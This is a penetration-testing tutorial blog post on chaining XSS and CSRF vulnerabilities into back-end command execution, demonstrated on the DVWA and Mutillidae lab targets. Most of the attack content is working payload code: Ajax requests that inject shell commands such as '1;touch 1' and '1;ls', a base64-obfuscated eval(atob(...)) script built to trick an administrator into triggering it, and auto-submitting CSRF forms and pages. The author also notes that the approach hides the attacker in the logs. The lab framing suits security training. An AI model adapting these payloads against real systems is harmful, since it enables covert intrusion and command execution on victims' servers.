In the actual penetration test, it is often encountered that the CMS used by the target has a back-end RCE vulnerability, which makes it unusable. However, the back-end RCE vulnerability can also be triggered by the target's front-end vulnerability.
{getButton} $text={XSS} $color={#00FF7F}
First, we use XSS vulnerabilities to trigger the back-end RCE, and this experiment is demonstrated with a DVWA target. Try to inject commands in the command injection part of the DVWA target:
1;ls{codeBox}
Through Burp, you can see that the request packet injected by the command is of POST type
.png)
If the target is not a DVWA target, but an actual environment, and the target happens to have XSS vulnerabilities, then the target administrator can be induced to trigger the RCE by constructing XSS. Write code to create a simple web page with XSS vulnerabilities, php.php:
<?php
highlight_file(__FILE__);
$id = $_GET['id'];
echo ($id);
?>{codeBox}
Since there is an XSS vulnerability, how to trigger an RCE request? We can use Ajax to construct requests. If the target does not have jQuery, how can we trigger Ajax requests? We can use the script tag to wrap a jQuery:
<script type="text/javascript" src="http://code.jquery.com/jquery-1.7.2.min.js"></script>{codeBox}
Then we can use Ajax to construct requests to trigger RCE. Payload:
$.post('http://192.168.64.129/DVWA/vulnerabilities/exec/',function(d) {
let p = $(d).contents().find('input[name=\"path\"]').val();
$.ajax({
url:'http://192.168.64.129/DVWA/vulnerabilities/exec/',
type:'POST',
data:{
"ip": '1;touch 1', //Execute command
"Submit": "Submit"},});
});{codeBox}
Note that the data content is consistent with the command injection package captured by Burp. Then Base64 Encode the code to prevent escape caused by special characters.
.png)
However, our browser cannot automatically parse Base64, so we need to parse this string of Base64 strings with the atob tag package. The complete package statement is as follows:
atob('JC5wb3N0KCdodHRwOi8vMTkyLjE2OC42NC4xMjkvRFZXQS92dWxuZXJhYmlsaXRpZXMvZXhlYy8nLGZ1bmN0aW9uKGQpIHsKICBsZXQgcCA9ICQoZCkuY29udGVudHMoKS5maW5kKCdpbnB1dFtuYW1lPVwicGF0aFwiXScpLnZhbCgpOwokLmFqYXgoewogIHVybDonaHR0cDovLzE5Mi4xNjguNjQuMTI5L0RWV0EvdnVsbmVyYWJpbGl0aWVzL2V4ZWMvJywKICB0eXBlOidQT1NUJywKICBkYXRhOnsKICAgICAgICJpcCI6ICcxO2xzJywKICAgICAgICJTdWJtaXQiOiAiU3VibWl0In0sfSk7Cn0pOw'){codeBox}
Note that single quotation marks are used to wrap the Base64 string as a whole to prevent parsing errors. Then use eval package to execute, and inject script tag to trigger XSS. Complete statement:
<script>eval(atob('JC5wb3N0KCdodHRwOi8vMTkyLjE2OC42NC4xMjkvRFZXQS92dWxuZXJhYmlsaXRpZXMvZXhlYy8nLGZ1bmN0aW9uKGQpIHsKICBsZXQgcCA9ICQoZCkuY29udGVudHMoKS5maW5kKCdpbnB1dFtuYW1lPVwicGF0aFwiXScpLnZhbCgpOwokLmFqYXgoewogIHVybDonaHR0cDovLzE5Mi4xNjguNjQuMTI5L0RWV0EvdnVsbmVyYWJpbGl0aWVzL2V4ZWMvJywKICB0eXBlOidQT1NUJywKICBkYXRhOnsKICAgICAgICJpcCI6ICcxO2xzJywKICAgICAgICJTdWJtaXQiOiAiU3VibWl0In0sfSk7Cn0pOw'))</script>{codeBox}
Because the target website may not have jQuery (very unlikely), the overall statement is:
http://IP/php.php?id=<script type="text/javascript" src="http://code.jquery.com/jquery-1.7.2.min.js"></script><script>eval(atob('JC5wb3N0KCdodHRwOi8vMTkyLjE2OC42NC4xMjkvRFZXQS92dWxuZXJhYmlsaXRpZXMvZXhlYy8nLGZ1bmN0aW9uKGQpIHsKICBsZXQgcCA9ICQoZCkuY29udGVudHMoKS5maW5kKCdpbnB1dFtuYW1lPVwicGF0aFwiXScpLnZhbCgpOwokLmFqYXgoewogIHVybDonaHR0cDovLzE5Mi4xNjguNjQuMTI5L0RWV0EvdnVsbmVyYWJpbGl0aWVzL2V4ZWMvJywKICB0eXBlOidQT1NUJywKICBkYXRhOnsKICAgICAgICJpcCI6ICcxO2xzJywKICAgICAgICJTdWJtaXQiOiAiU3VibWl0In0sfSk7Cn0pOw'))</script>{codeBox}
.png)
Access the address through a browser.
.png)
.png)
$.post('http://192.168.64.129/DVWA/vulnerabilities/exec/',function(d) {let p = $(d).contents().find('input[name=\"path\"]').val();{codeBox}
.png)
Request 28 is automatically constructed through Ajax. You can see that the response has been successful:
.png)
Switch to the directory corresponding to the DVWA target vulnerability, and you can see that the file has been successfully created:
.png)
Of course, you can not only create files, but also directly execute commands. Take ls as an example:
.png)
{getButton} $text={CSRF} $color={#87CEEB}
For the target of CSRF, take the DNS query function of OWASP target as an example. First, we execute the following command:
.png)
The POC of the CSRF is constructed through the request captured by Burp. If Burp is a community version, you can install the LazyCSRF plug-in on Github:
.png)
Simply modify its code:
<html>
<body>
<form method="POST" action="http://192.168.64.130:80/mutillidae/index.php?page=dns-lookup.php">
<input name="target_host" value='8.8.8.8;touch 1'>
<input name="dns-lookup-php-submit-button" type="submit" value='Lookup DNS'>
</form>
</body>
</html>{codeBox}
Access the code rendering as follows:
.png)
After clicking the button to execute, you can view the new file named 1 on the target terminal of OWASP:
.png)
.png)
{getButton} $text={CSRF+Ajax} $color={#FFD700}
What will happen if we combine CSRF with Ajax? We know that CSRF can forge the request of the target user, but it still leaves its own request record. We can try to combine CSRF with Ajax to construct the request by writing the Ajax of the web page, so that the target can execute any request we construct by itself. Write code:
<script type="text/javascript" src="http://code.jquery.com/jquery-1.7.2.min.js"></script>
<script>
$.ajax({
url:'http://192.168.64.130/mutillidae/index.php?page=dns-lookup.php',
type:'POST',
ContentType:'application/x-www-form-urlencoded',
data:'target_host=8.8.8.8;touch cat&dns-lookup-php-submit-button=Lookup DNS'});
</script>{codeBox}
When the target accesses the page, it will execute the request we constructed by itself. The principle is the same as that of CSRF.
.png)
.png)
The RCE triggered by these front-end vulnerability methods will be more hidden, and through log viewing, it can only be seen that the attack statements are executed by the target itself.
0 Comments